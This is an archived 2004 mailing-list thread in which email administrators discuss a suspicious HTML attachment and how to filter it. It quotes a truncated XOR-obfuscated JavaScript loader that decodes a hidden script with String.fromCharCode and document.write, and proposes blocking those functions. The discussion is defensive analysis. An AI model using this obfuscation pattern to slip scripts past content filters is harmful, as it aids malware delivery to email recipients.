Possible virus in JavaScript attachment?

Tue Mar 9 13:59:20 GMT 2004

I have seen at least 100 or so over the last couple weeks...

Thought it was just marketing crap , but now that you mentioned it... there
was some weird coding in it....

Rob Charles
TheHostMasters
Montreal, Canada
514-846-0006
Rob at TheHostMasters.com
http://www.TheHostMasters.com

----- Original Message -----
From: "Olivier Diserens" <olivier.diserens at FASTNET.CH>
To: <MAILSCANNER at JISCMAIL.AC.UK>
Sent: Monday, March 08, 2004 4:42 PM
Subject: Re: Possible virus in JavaScript attachment?

> Hi,
>
> I already saw this a couple of times.
> This is a way to inject some javascript code in a page without actually
> writting the script, but instead giving the ascii characters code..
> thus bypassing the dangerous contents check.
> The script will itself do the translation and get back the bad script.
>
> I was thinking of a check around the fromCharCode() function. Denying
> it will block this kind of stuff. I can't see another fromCharCode-like
> function that would be usefull to prevent, but I'm not a javascript
> expert.
>
> document.write may also be a little bit risky, no ?
>
> other ideas ?
>
> best regards
> Olivier Diserens
>
>
>
> Le 8 mars 04, à 22:30, Jim Holland a écrit :
>
> > I have come across a number of suspicious messages with subject line
> > "hi", body text "This message has an attach", and the attachment
> > "superscripted.html", which contains the following type of scripting:
> >
> > <script language="JavaScript">
> > difficulties = new Array(115,
> > 180,145,215,7,246,108,140,123,22,242,
> > . . .
> > 231,65,65,159,150,180,80,101,27,27,
> > 218);
> > bribed = new Array(79,
> > 220,229,186,107,200,97,134,71,116,157,
> > . . .
> > 80,73,78,111,124,5,90,139,104,129
> > );
> > Shelton = 1142;
> > rupee = 231;
> > var obelisk = "";
> > for(Winslow = 0; Winslow < Shelton; Winslow++)
> >   obelisk = obelisk + String.fromCharCode(difficulties[Winslow] ^
> >  bribed[Winslow % rupee]);
> > document.write(obelisk);
> > </script>
> >
> > These are not being blocked by MailScanner/ClamAV.  I don't know any
> > JavaScript, but the above looks distinctly suspect.  Does anyone know
> > what
> > it is all about/whether it is potentially harmful?  Does this indicate
> > a
> > possible exploit that should be blocked?
> >
> > We automatically quarantine any html attachments that contain
> > scripting,
> > but this is just done by testing using a simple grep and has nothing
> > to do
> > with MailScanner.  Are we just being paranoid?  I would prefer to have
> > this done by MailScanner for consistency.
> >
> > Regards
> >
> > Jim Holland
> > System Administrator
> > MANGO - Zimbabwe's non-profit e-mail service
>